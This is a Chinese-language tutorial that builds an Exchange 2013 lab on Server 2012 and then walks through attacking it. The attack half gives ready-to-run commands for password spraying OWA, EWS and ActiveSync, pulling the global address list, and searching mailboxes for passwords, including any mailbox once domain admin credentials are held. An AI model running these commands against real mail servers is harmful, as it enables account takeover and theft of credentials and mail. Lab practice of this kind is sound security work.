Exchange环境搭建以及攻击漏洞利用

0x01 环境搭建

1
2
server 2012
exchange 2013
  • 2012安装vmware tools
1
2
安装需要先打个补丁,kb2919355,但是你要是直接装的话,还装不上。
具体参考链接:https://blog.csdn.net/qwq1503/article/details/65916426
  • 记得先改一下计算机名
1
不改也能用,就是比较傻
  • 装好exchange以后,记得域激活用户
1
Get-User -RecipientTypeDetails User -Filter { UserPrincipalName -ne $Null } | Enable-Mailbox
搭建

AD搭建是傻瓜化的,没啥问题。

Exchange搭建要分步骤

  1. powershell执行

    1
    Install-WindowsFeature AS-HTTP-Activation, Desktop-Experience, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, RSAT-Clustering-Mgmt, RSAT-Clustering-PowerShell, Web-Mgmt-Console, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation, RSAT-ADDS
  2. 安装 NET Framework 4.5.2

  3. 忘了,反正会提示,缺啥装啥,主要是坑点。
搭建的服务目录及相关说明

装好以后,可以在iis管理器中看到exchange的几个目录


0x02 攻击利用

1
2
3
4
1. 爆破
2. 拉取邮箱地址
3. 搜索内容
4. 命令执行
1. 爆破

爆破

  • 用burp

    1
    2
    /Microsoft-Server-ActiveSync 爆破为401认证,需要对用户账号密码进行base64处理
    /ews、/rpc 等几个endpoint同样为401认证,账号密码的加密方式为net-ntlm
  • 用工具

1
2
3
4
5
6
7
8
owa爆破
Invoke-PasswordSprayOWA -ExchHostname OWAHOST -UserList .\user.txt -Password password -Threads 1 -Domain domainname -OutFile out.txt -Verbose

ews爆破
Invoke-PasswordSprayEWS -ExchHostname EWSHOST -UserList .\user.txt -Password password -Threads 1 -Domain domainname -OutFile out.txt -Verbose

通过Microsoft-Server-ActiveSync爆破:
Invoke-PasswordSprayEAS -ExchHostname MSAHOST -UserList .\user.txt -Password password -Threads 1 -Domain domainname -OutFile out.txt -Verbose
2. 拉取邮箱地址

用到的工具:https://github.com/dafthack/MailSniper

1
Get-GlobalAddressList -ExchHostname owaurl -UserName username -Password password
3. 搜索内容

内网中用来检索一个邮箱中的相关内容(使用当前用户登录)

1
Invoke-SelfSearch -Mailbox user@domain.com -Terms *pass* -Folder all -ExchangeVersion Exchange2013_SP1 -OutputCsv 1.csv

如果有域管理密码,则可以检索任意邮箱内容

1
Invoke-GlobalMailSearch -ImpersonationAccount beiguoxia -ExchHostname Exchangehostname -AdminUserName domain\administrator  -AdminPassword password -Term "*pass*" -Folder all

4. 命令执行

命令执行这个,感觉不太好用,必须配合outlook,也就是说,对方必须使用outlook才能成功。
而且只能执行exe,就是不能带任何参数。